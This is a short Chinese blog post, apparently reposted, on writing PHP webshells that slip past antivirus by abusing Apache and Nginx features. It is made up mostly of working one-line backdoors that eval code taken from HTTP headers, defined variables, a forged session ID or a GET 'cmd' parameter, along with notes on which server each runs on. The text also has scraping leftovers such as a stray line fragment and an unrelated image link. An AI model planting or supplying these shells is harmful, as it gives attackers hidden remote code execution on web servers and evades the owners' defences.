1 2 3 ?php eval ( hex2bin ( session_id ( session_start ( )
环境函数用法
nginx
get_defined_vars()
返回由所有已界说变量所构成的数组
apache
getallheaders()
获取全部 HTTP 请求头信息
1 2 3
<?php
eval(next(getallheaders()));
?>
apache和nginx环境通用
1 2 3
<?php
eval(implode(reset(get_defined_vars())));
?>
此外一种通过执行伪造的sessionid值,,进行任意代码执行。
1 2 3
<?php
eval(hex2bin(session_id(session_start())));
?>
给webshell加暗码
1
<?php eval(get_defined_vars()[‘_GET‘][‘cmd‘]);?>
PHP操作Apache、Nginx的特性实现免杀Webshell
温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/32691.html
![[转]Node.js中package.json中^和~的区别](/uploads/allimg/200519/054J34453_lit.png "[转]Node.js中package.json中^和~的区别")